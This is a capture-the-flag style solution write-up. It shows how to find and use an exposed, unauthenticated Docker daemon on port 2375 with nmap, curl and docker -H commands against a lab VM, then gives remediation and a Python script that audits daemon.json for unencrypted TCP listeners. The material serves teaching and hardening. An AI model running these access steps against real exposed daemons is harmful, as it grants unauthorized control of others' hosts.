Exploiting docker misconfiguration - Solution

The Docker daemon can listen for Docker Engine API requests on three types of socket: unix, tcp, and fd. Remote access requires the tcp socket. The default tcp setup provides un-encrypted and un-authenticated direct access to the Docker daemon. By convention, port 2375 is used for un-encrypted and port 2376 for encrypted communication with the daemon.

  • Scan ports 2375 and 2376 with nmap from the student VM
nmap -p 2375,2376 -n 192.168.56.4 -v

[Screenshot: nmap scan for port 2375]

  • We can query the Docker API directly using curl
curl 192.168.56.4:2375/images/json | jq .

[Screenshot: accessing images via curl]

  • An attacker can abuse this by pointing the docker client at the exposed daemon to access the host system's Docker runtime
docker -H tcp://CTFVMIP:2375 ps
docker -H tcp://CTFVMIP:2375 images

[Screenshot: docker tcp host usage]

  • Now we have full privilege over the host system :)

Fixing this vulnerability

  • If the Docker API must be exposed over the network, expose it on port 2376 with encryption. Otherwise keep the daemon on the unix or fd socket and do not expose it on tcp at all.
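As an added example (not part of the original write-up), the following Python script audits a Docker daemon.json for the misconfiguration shown above and contrasts it with a hardened configuration. Both embedded configurations are constructed samples: the certificate paths under /etc/docker are hypothetical, and the check relies on dockerd's `tlsverify` option, which makes the daemon refuse clients that do not present a certificate signed by the configured CA.

```python
import json
from urllib.parse import urlsplit

# Constructed sample daemon.json contents. The listener addresses and the
# certificate paths are hypothetical values for this demonstration, not taken
# from any real host.
WEAK_DAEMON_JSON = """
{
  "hosts": ["unix:///var/run/docker.sock", "tcp://0.0.0.0:2375"]
}
"""

HARDENED_DAEMON_JSON = """
{
  "hosts": ["unix:///var/run/docker.sock", "tcp://0.0.0.0:2376"],
  "tlsverify": true,
  "tlscacert": "/etc/docker/ca.pem",
  "tlscert": "/etc/docker/server-cert.pem",
  "tlskey": "/etc/docker/server-key.pem"
}
"""

LOOPBACK = ("127.0.0.1", "::1", "localhost")
TLS_MATERIAL_KEYS = ("tlscacert", "tlscert", "tlskey")


def audit_daemon_config(config_text):
    """Return a list of (severity, message) findings for the hosts[] of a daemon.json.

    "high"   - tcp:// listener without tlsverify: anyone who can reach the port
               controls the daemon (the situation exploited above)
    "medium" - tcp:// listener bound to loopback only, but still unauthenticated
    "low"    - hygiene issues: encrypted listener on the conventional plaintext
               port 2375, or certificate paths left implicit
    """
    cfg = json.loads(config_text)
    findings = []
    tlsverify = bool(cfg.get("tlsverify", False))
    tcp_listeners = []

    for host in cfg.get("hosts", []):
        parts = urlsplit(host)
        if parts.scheme != "tcp":
            continue  # unix:// and fd:// listeners are local-only; out of scope here
        tcp_listeners.append(host)
        # An empty bind address is treated conservatively as "all interfaces".
        bind = parts.hostname or "0.0.0.0"
        if not tlsverify:
            severity = "medium" if bind in LOOPBACK else "high"
            findings.append((severity, f"{host}: TCP listener without client "
                                       f"certificate verification (tlsverify)"))
        elif parts.port == 2375:
            findings.append(("low", f"{host}: encrypted listener on port 2375, "
                                    f"the conventional plaintext port; use 2376"))

    # With tlsverify on, dockerd falls back to default certificate locations if
    # none are configured; flag that so the operator knows which files are in use.
    if tcp_listeners and tlsverify:
        for key in TLS_MATERIAL_KEYS:
            if key not in cfg:
                findings.append(("low", f"{key} not set; daemon will use its default path"))
    return findings


if __name__ == "__main__":
    for name, text in (("weak", WEAK_DAEMON_JSON), ("hardened", HARDENED_DAEMON_JSON)):
        print(f"{name}: {audit_daemon_config(text) or 'no findings'}")
```

Running the script reports one high finding for the weak configuration and nothing for the hardened one. Two practical points when applying the hardened form on a real host: `tlsverify` implies TLS, so `"tls": true` is not needed separately; and on systemd-based installs where the unit file already starts dockerd with `-H fd://`, a `hosts` key in daemon.json conflicts with that flag and the daemon will refuse to start, so the tcp listener should then be configured through a systemd drop-in instead.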